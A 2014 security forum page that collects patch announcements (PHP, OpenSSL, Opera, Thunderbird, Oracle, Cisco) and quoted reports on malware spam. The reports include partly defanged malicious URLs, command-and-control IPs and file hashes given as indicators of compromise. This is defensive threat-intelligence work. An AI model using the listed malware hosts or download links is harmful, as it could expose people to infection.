News: Cexx forums, with volunteers dedicated to helping you remove malware and stay protected
 
Welcome, Guest. Please login or register.
Did you miss your activation email?

Login with username, password and session length
November 22, 2014, 13:05:30
Pages: 1 ... 7 8 [9] 10
 81 
 on: October 16, 2014, 12:55:30  
Started by AplusWebMaster - Last post by AplusWebMaster
FYI...

PHP 5.5.18 released
- http://php.net/
16 Oct 2014 - "The PHP development team announces the immediate availability of PHP 5.5.18. Several bugs were fixed in this release. A -regression- in OpenSSL introduced in PHP 5.5.17 has also been addressed in this release. PHP 5.5.18 also fixes -4- CVEs in different components. All PHP 5.5 users are encouraged to upgrade to this version..."

Changelog:
- http://php.net/ChangeLog-5.php#5.5.18

Downloads:
- http://www.php.net/downloads.php

- http://windows.php.net/download/

 Exclamation

 82 
 on: October 16, 2014, 12:27:25  
Started by AplusWebMaster - Last post by AplusWebMaster
FYI...

Fake Bank SPAM
- http://blog.dynamoo.com/2014/10/barclays-bank-transaction-not-complete.html
16 Oct 2016 - "This fake Barclays spam leads to malware.
   From:     Barclays Bank [Barclays@email .barclays .co.uk]
    Date:     16 October 2014 12:48
    Subject:     Transaction not complete
    Unable to complete your most recent Transaction.
    Currently your transaction has a pending status. If the transaction was made by mistake please contact our customer service.
    For more details please download payment receipt below...


Clicking on the link downloads a file document23_pdf.zip containing a malicious executable document23_pdf.scr which has a VirusTotal detection rate of 4/54*. The Malwr report shows that it reaches out to the following URLs:
http ://188.165.214.6 :12302/1610uk1/HOME/0/51-SP3/0/
http ://188.165.214.6 :12302/1610uk1/HOME/1/0/0/
http ://188.165.214.6 :12302/1610uk1/HOME/41/5/1/
http ://jwoffroad .co.uk/img/t/1610uk1.osa
In my opinion 188.165.214.6 (OVH, France) is an excellent candidate to -block- or monitor. It also drops two executables, bxqyy.exe (VT 5/54** ...) and ldplh.exe (VT 1/51*** ...)."
* https://www.virustotal.com/en/file/626687777469a5a1cca0303fd565ee230fb5f5799a6d8cbaec097a5f7266eb28/analysis/1413462043/
... Behavioural information
DNS requests
jwoffroad .co.uk (88.208.252.216)
TCP connections
188.165.214.6: https://www.virustotal.com/en/ip-address/188.165.214.6/information/
88.208.252.216: https://www.virustotal.com/en/ip-address/88.208.252.216/information/

** https://www.virustotal.com/en/file/8d5d66e390e2293bec87422dfa2f4683b423e8084a07de207a75d2831f88d9a8/analysis/1413462507/

*** https://www.virustotal.com/en/file/752afd97f0473ec909797c02ac49b3f33e94ca06d6678af517d6d2fe98e00341/analysis/1413462517/
___

Many .su and .ru domains leading to malware
- http://blog.dynamoo.com/2014/10/a-bunch-of-su-and-ru-domains-leading-to.html
16 Oct 2016 - "These sites lead to some sort of malware. The presence of .SU domains hosted on what looks like a botnet is probably all you need to know.... recommend watching out for these..."
(Long list at the dynamoo URL above.)

- https://www.abuse.ch/?p=3581

- http://blog.dynamoo.com/2013/03/zbot-sites-to-block.html
"The obsolete .su (Soviet Union) domain is usually a tell-tale sign..."

___

Fake Invoice SPAM
- http://myonlinesecurity.co.uk/re-invoice-4023390-fake-pdf-malware/
16 Oct 2016 - "'RE: Invoice #4023390' pretending to come from Sage Accounting < Alfonso.Williamson@ sage-mail .com >is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:

    Please see attached copy of the original invoice.

16 October 2014: Invoice_4017618.zip: Extracts to: Invoice_4017618.exe
Current Virus total detections: 5/54* . This RE: Invoice #4023390 is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/e9645b9120975b47e440f60c182e4701e14c9f653a55bb0b4bec82bb71fe1c2d/analysis/1413490281/
... Behavioural information
DNS requests
lewis-teck .co.uk (5.77.44.47)
TCP connections
188.165.214.6: https://www.virustotal.com/en/ip-address/188.165.214.6/information/
5.77.44.47: https://www.virustotal.com/en/ip-address/5.77.44.47/information/
___

FBI warns of Chinese cyber campaign
- http://www.washingtonpost.com/world/national-security/fbi-warns-industry-of-chinese-cyber-campaign/2014/10/15/0349a00a-54b0-11e4-ba4b-f6333e2c0453_story.html
Oct 15, 2014 - "The FBI on Wednesday issued a private warning to industry that a group of highly skilled Chinese government hackers was in the midst of a long-running campaign to steal valuable data from U.S. companies and government agencies. “These state-sponsored hackers are exceedingly stealthy and agile by comparison with the People’s Liberation Army Unit 61398... whose activity was publicly disclosed and attributed by security researchers in February 2013,” said the FBI in its alert, which referred to a Chinese military hacker unit exposed in a widely publicized report by the security firm Mandiant... The group, the FBI said, has deployed at least four “zero-day exploits” or hacking tools based on previously unknown flaws in Microsoft’s Windows operating system, which reflects a considerable degree of prowess as zero-day flaws are difficult to find in software. The bureau’s nine-page alert contained some “indicators of compromise” that companies could use to determine if they have been hacked by the group..."

 Evil or Very Mad Evil or Very Mad  Sad

 83 
 on: October 16, 2014, 10:44:53  
Started by AplusWebMaster - Last post by AplusWebMaster
FYI...

OpenSSL patches 4 vulnerabilities
- https://www.us-cert.gov/ncas/current-activity/2014/10/16/OpenSSL-Patches-Four-Vulnerabilities
Oct 16, 2014 - "OpenSSL has released updates patching four vulnerabilities, some of which may allow an attacker to cause a Denial of Service (DoS) condition or execute man-in-the-middle attacks. The following updates are available:
 OpenSSL 1.0.1 users should upgrade to 1.0.1j
 OpenSSL 1.0.0 users should upgrade to 1.0.0o
 OpenSSL 0.9.8 users should upgrade to 0.9.8zc
US-CERT recommends users and administrators review the OpenSSL Security Advisory* for additional information and apply the necessary updates."
* https://www.openssl.org/news/secadv_20141015.txt

- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3513
- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3566 - 4.3
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3567
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3568
___

- http://www.securitytracker.com/id/1031053
Oct 15 2014

- http://www.securitytracker.com/id/1031052
Oct 15 2014

 Exclamation

 84 
 on: October 16, 2014, 03:31:09  
Started by AplusWebMaster - Last post by AplusWebMaster
FYI...

Opera 25 released
- http://www.opera.com/docs/changelogs/unified/2500/
2014-10-15
Improvements since Opera 24:
- Stability enhancements.
- Enhanced support for Chromium extensions.
- Memory and loading improvements for the start page.
- Fixes and enhancements for how Opera handles HiDPI video and MP3 audio.
- Network installation for Mac.
- Enhancement for the Opera tile icon on Windows 8.

- https://secunia.com/advisories/60965/
Release Date: 2014-10-16
... vulnerabilities are caused due to a bundled, vulnerable version of Chromium. No further information is currently available.
The vulnerabilities are reported in versions prior to 25.
Solution: Upgrade to version 25.
___

Note: Opera market share is reported at under 1% for Sep 2014:
- http://www.netmarketshare.com/browser-market-share.aspx?qprid=0&qpcustomd=0
Posts in this thread will be made when it rises above that mark.


 Exclamation

 85 
 on: October 16, 2014, 02:24:06  
Started by AplusWebMaster - Last post by AplusWebMaster
FYI...

SSL Padding Oracle On Downgraded Legacy Encryption (POODLE) Vuln
- http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20141015-poodle
2014 Oct 15 - "Summary: On October 14, 2014, a vulnerability was publicly announced in the Secure Sockets Layer version 3 (SSLv3) protocol when using a block cipher in Cipher Block Chaining (CBC) mode. SSLv3 is a cryptographic protocol designed to provide communication security, which has been superseded by Transport Layer Security (TLS) protocols. By exploiting this vulnerability, an attacker could decrypt a subset of the encrypted communication.
Affected Products: Cisco is evaluating products to determine their exposure to this vulnerability.
Products will be listed in the Vulnerable Products section of this advisory if they fit both the following criteria:
    SSLv3 is supported by the product
    A block cipher in CBC mode is one of the transform sets being offered
Products will be listed in the Products Confirmed Not Vulnerable section of this advisory if they fit either of the following criteria:
    SSLv3 is not supported by the product
    SSLv3 is supported by the product but no block cipher in CBC mode is offered in the transform set...
The list of vulnerable products will be populated as the products are being evaluated..."

Cisco TelePresence Video Communication Server and Cisco Expressway Software Multiple Vulns
- http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20141015-vcs
2014 Oct 15 - "Summary: Cisco TelePresence Video Communication Server (VCS) and Cisco Expressway Software includes the following vulnerabilities:
    Cisco TelePresence VCS and Cisco Expressway Crafted Packets Denial of Service Vulnerability
    Cisco TelePresence VCS and Cisco Expressway SIP IX Filter Denial of Service Vulnerability
    Cisco TelePresence VCS and Cisco Expressway SIP Denial of Service Vulnerability
Succesfull exploitation of any of these vulnerabilities could allow an unauthenticated, remote attacker to cause a reload of the affected system, which may result in a Denial of Service (DoS) condition. Cisco has released free software updates that address these vulnerabilities. Workarounds that mitigate these vulnerabilities are not available..."
- http://www.securitytracker.com/id/1031055
CVE Reference: CVE-2014-3368, CVE-2014-3369, CVE-2014-3370
Oct 15 2014
Fix Available:  Yes  Vendor Confirmed:  Yes ...
Impact: A remote user can cause the target system to crash and reload.
Solution: The vendor has issued a fix (X8.2)...

Cisco TelePresence MCU Software Memory Exhaustion Vuln
- http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20141015-mcu
2014 Oct 15 - "Summary: A vulnerability in the network stack of Cisco TelePresence MCU Software could allow an unauthenticated, remote attacker to cause the exhaustion of available memory which could lead to system instability and a reload of the affected system. Cisco has released free software updates that address this vulnerability. Workarounds that mitigate this vulnerability are not available..."
- http://www.securitytracker.com/id/1031054
CVE Reference: CVE-2014-3397
Oct 15 2014
Fix Available:  Yes  Vendor Confirmed:  Yes 
Version(s): prior to 4.3(2.30)...
The following models are affected:
Cisco TelePresence MCU 4200 Series
Cisco TelePresence MCU 4500 Series
Cisco TelePresence MCU MSE 8420
Impact: A remote user can consume all available memory, causing the system to become unstable and reload.
Solution: The vendor has issued a fix (4.3(2.30))...

Cisco Unified Communications Domain Manager Multiple Vulns
- http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140702-cucdm
2014 Oct 13 - Rev. 3.0 - "Summary: Cisco Unified Communications Domain Manager (Cisco Unified CDM) is affected by the following vulnerabilities:
- Cisco Unified Communications Domain Manager Privilege Escalation Vulnerability
- Cisco Unified Communications Domain Manager Default SSH Key Vulnerability
- Cisco Unified Communications Domain Manager BVSMWeb Unauthorized Data Manipulation Vulnerability
Successful exploitation of the Cisco Unified Communications Domain Manager Privilege Escalation Vulnerability or of the Cisco Unified Communications Domain Manager Default SSH Key Vulnerability may allow an attacker to execute arbitrary commands or obtain privileged access to the affected system.
Successful exploitation of the Cisco Unified Communications Domain Manager BVSMWeb Unauthorized Data Manipulation Vulnerability may allow an attacker to access and modify BVSMWeb portal user information such settings in the personal phone directory, speed dials, Single Number Reach, and call forward settings.
Cisco has released free software updates that address the Cisco Unified Communications Domain Manager Privilege Escalation Vulnerability and the Cisco Unified Communications Domain Manager Default SSH Key Vulnerability.
Cisco will provide a free software update for the Cisco Unified Communications Domain Manager BVSMWeb Unauthorized Data Manipulation Vulnerability as soon as the fix is available. Workarounds that mitigate these vulnerabilities are not available. Customers that are concerned about the Cisco Unified Communications Domain Manager BVSMWeb Unauthorized Data Manipulation Vulnerability may apply the mitigation detailed in the "Workarounds" section of this advisory.
Note: Due to an error in the fix of the Cisco Unified Communications Domain Manager Default SSH Key Vulnerability, all Cisco Unified CDM Platform Software releases are vulnerable regardless if a previous patch has been applied due to this security advisory. This advisory has been updated to provide additional information about the fix for the Cisco Unified Communications Domain Manager Default SSH Key Vulnerability..."
Rev 3.0 - 2014-Oct-13 - Added important information regarding fixed versions of the Cisco Unified Communications Domain Manager Default SSH Key Vulnerability.

 Exclamation Exclamation Exclamation

 86 
 on: October 15, 2014, 07:08:40  
Started by AplusWebMaster - Last post by AplusWebMaster
FYI...

Adblock Plus 1.8.6 for Chrome, Opera and Safari released
- https://adblockplus.org/releases/adblock-plus-186-for-chrome-opera-and-safari-released
2014-10-15 - "Adblock Plus 1.8.6 for Chrome, Opera (Opera 17 or higher required), and Safari (Safari 6 or higher required)..."

Links to the install files and more detail at the URL above.

 Cool

 87 
 on: October 15, 2014, 04:37:19  
Started by AplusWebMaster - Last post by AplusWebMaster
FYI...

Thunderbird v31.2 released
- http://www.securitytracker.com/id/1031030
CVE Reference: CVE-2014-1574, CVE-2014-1575, CVE-2014-1576, CVE-2014-1577, CVE-2014-1578, CVE-2014-1581, CVE-2014-1583, CVE-2014-1585, CVE-2014-1586
Oct 15 2014
Impact: Execution of arbitrary code via network, User access via network
Fix Available:  Yes  Vendor Confirmed:  Yes  
Version(s): prior to 31.2 ...
Solution: The vendor has issued a fix (31.2)...

- https://www.mozilla.org/en-US/thunderbird

- https://www.mozilla.org/en-US/thunderbird/31.2.0/releasenotes/
v.31.2.0, released: Oct 14, 2014

Security Advisories
- https://www.mozilla.org/security/known-vulnerabilities/thunderbird.html#thunderbird31.2
Fixed in Thunderbird 31.2
MFSA 2014-81 Inconsistent video sharing within iframe
MFSA 2014-79 Use-after-free interacting with text directionality
MFSA 2014-77 Out-of-bounds write with WebM video
MFSA 2014-76 Web Audio memory corruption issues with custom waveforms
MFSA 2014-75 Buffer overflow during CSS manipulation
MFSA 2014-74 Miscellaneous memory safety hazards (rv:33.0 / rv:31.2)

Automated Updates: https://support.mozillamessaging.com/en-US/kb/updating-thunderbird
Manual check: Go to >Help >About Thunderbird

Download: https://www.mozilla.org/thunderbird/all.html

 Exclamation

 88 
 on: October 15, 2014, 03:59:34  
Started by AplusWebMaster - Last post by AplusWebMaster
FYI...

Fake delivery SPAM - word doc malware ...
- http://myonlinesecurity.co.uk/inform-package-way-fake-word-doc-malware/
15 Oct 2014 - "An email pretending that you have purchased an unspecified item from an unspecified store saying 'This is to inform you that the package is on its way to you' coming from random email addresses is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
    Thank you for buying at our store!
    Date ordered: October 14 2014
    This is to inform you that the package is on its way to you. We also included delivery file to your shipping address.
    Payment Nr : 7795816097 Order total : 527.54 USD Delivery date : 10/ 22th 2014.
    Please review the attached document.


15 October 2014: 0048898757_order _doc.zip: Extracts to: 0048898757_order _doc.exe
Current Virus total detections: 7/54* . This 'This is to inform you that the package is on its way to you' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper word doc file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/8c41235f43356c845b193b04efa60bbecb1787028e8ad6e25eb4c01ee2d94804/analysis/1413361301/
___

Fake 'Shipping Info' SPAM
- http://blog.dynamoo.com/2014/10/shipping-information-for-spam-uses.html
15 Oct 2014 - "This fake shipping spam contains malware.. although it appears that it may be buggy and might not install properly.

Screenshot: https://3.bp.blogspot.com/-l3nlpqmPSoo/VD6K3ZdvApI/AAAAAAAAF1E/a_k4VUkXNX0/s1600/shipping-info.png

The link in the email goes to https ://www.google .com/url?q=https%3A%2F%2Fcopy.com%2FEl9fd4VfLkfN%2FTrackShipment_0351.PDF.scr%3Fdownload%3D1&sa=D&sntz=1&usg=AFQjCNE0-3UrX7jNPzSGYodsQVzmBhrwMA which bounces through Google and then downloads a malicious executable TrackShipment_0351.PDF.scr which has a VirusTotal detection rate of 4/54*... What I think is meant to happen is that a malicious script that has been disguising itself as a GIF file which then renames a component Gl.png to Gl.exe and then attempts to execute it... This executable has a VirusTotal detection rate of 2/53**. It bombs out of automated analysis tools... possibly because it is being executed with the wrong parameters. It also opens a seemingly legitimate PDF file (VT 0/54***) which is designed to look like a Commercial Invoice, presumably to mask the fact that it is doing something malicious in the background.
> https://4.bp.blogspot.com/-86SXLSZk37U/VD6PBROpsAI/AAAAAAAAF1c/ZRCiUJev-KI/s1600/commerical-invoice.png
If you opened a file similar to this and you saw a PDF with a blank Commercial Invoice like the one pictured above, then you've probably been -infected- by the executable running in the background."
* https://www.virustotal.com/en-gb/file/e5f0ea546dcfb99803c9a02df82f587fa09b16c87337e868d8eabf360178ba59/analysis/1413383394/

** https://www.virustotal.com/en-gb/file/f9cca52c9d840f3cfc8997e77a42ebc7640ea71f7729fa1782d8596a05ed963b/analysis/1413384221/

*** https://www.virustotal.com/en-gb/file/409e472b667ae747942e10d4dc691796c3b2eb00a0e407146e69b2f8205de40c/analysis/1413384174/
___

Fake Paypal SPAM – PDF malware
- http://myonlinesecurity.co.uk/paypal-transaction-complete-fake-pdf-malware/
15 Oct 2014 - "'Transaction not complete' pretending to come from PayPal is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:

     Unable to complete your most recent Transaction.
    Currently your transaction has a pending status.
    If the transaction was made by mistake please contact our customer service.
    For more details please see attached payment receipt .


15 October 2014: Transaction25765048.zip: Extracts to: Transaction_21633987.scr
Current Virus total detections: 7/54* . This 'Transaction not complete' pretending to come from PayPal is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/4b742cf87e49bc1cca0ce474ac34dd04ae00e28783aeafcfcd5a45a369be6543/analysis/1413387437/

 Evil or Very Mad  Sad

 89 
 on: October 15, 2014, 03:43:39  
Started by AplusWebMaster - Last post by AplusWebMaster
FYI...

KB2952664 problems ...
- http://myonlinesecurity.co.uk/microsoft-update-kb2952664-problems/
15 Oct 2014 - "Once again the October 2014 windows updates are causing problems on many computers. The biggest problem this month appears to be KB2952664 update for Windows 7. Do -not- install KB 2952664 update for Windows 7 unless you intend to update the windows 7 computer to either Windows 8 or the windows 10 preview. Various forums, including Microsoft help forums* are full of posts complaining about it failing. There is absolutely no need for the majority of users to install this update on their computer. If you have installed it, it will appear in the update history as -failed-. Go to programs & features, all updates and select KB2952664, press uninstall, reboot the computer and all will be OK. Then go to windows update, press check for updates, when the KB2952664 appears in the window, right click the entry and select -hide- update. You might then get a prompt asking for your admin account password if you are running as a standard user or a normal UAC prompt to continue with hiding the update. This KB 2952664 update for Windows 7 has been continually pushed out by Microsoft almost every month since April 2014 with various tweaks and revisions. Most have had some degree of install problems or have caused some degree of system instabilities. The October 2014 version appears to be the most problematic. It isn’t needed so don’t install it..."
* http://answers.microsoft.com/en-us/windows/forum/windows_7-windows_update/new-windows-update-inconsistency-regarding-update/30c7c7d4-d15b-49ed-a08f-edcf9ac1347b

Compatibility update for upgrading Windows 7
- https://support.microsoft.com/kb/2952664

> http://www.infoworld.com/article/2833825/microsoft-windows/windows-7-patch-kb-2952664-fails-with-error-80242016.html
Oct 15, 2014

 Exclamation Neutral  Sad

 90 
 on: October 14, 2014, 15:39:22  
Started by AplusWebMaster - Last post by AplusWebMaster
FYI...

Oracle Critical Patch Update Advisory - October 2014
- http://www.oracle.com/technetwork/topics/security/cpuoct2014-1972960.html
Oct 14, 2014 - "... This Critical Patch Update contains -154- new security fixes across the product families listed below. Please note that a blog entry summarizing the content of this Critical Patch Update and other Oracle Software Security Assurance activities is located at:
- https://blogs.oracle.com/security/entry/october_2014_critical_patch_update
Please note that on September 26, 2014, Oracle released a Security Alert for CVE-2014-7169 "Bash"* and other publicly disclosed vulnerabilities affecting GNU Bash. Customers of affected Oracle products are strongly advised to apply the fixes that were announced in the Security Alert for CVE-2014-7169..."
* http://www.oracle.com/technetwork/topics/security/alert-cve-2014-7169-2303276.html

Patch Availability Table
- http://www.oracle.com/technetwork/topics/security/cpuoct2014-1972960.html#PIN

October 2014 Risk Matrices
- http://www.oracle.com/technetwork/topics/security/cpuoct2014verbose-1972962.html

 Exclamation Exclamation Exclamation

Pages: 1 ... 7 8 [9] 10
Powered by SMF 1.1.20 | SMF © 2013, Simple Machines Page created in 3.58 seconds with 16 queries.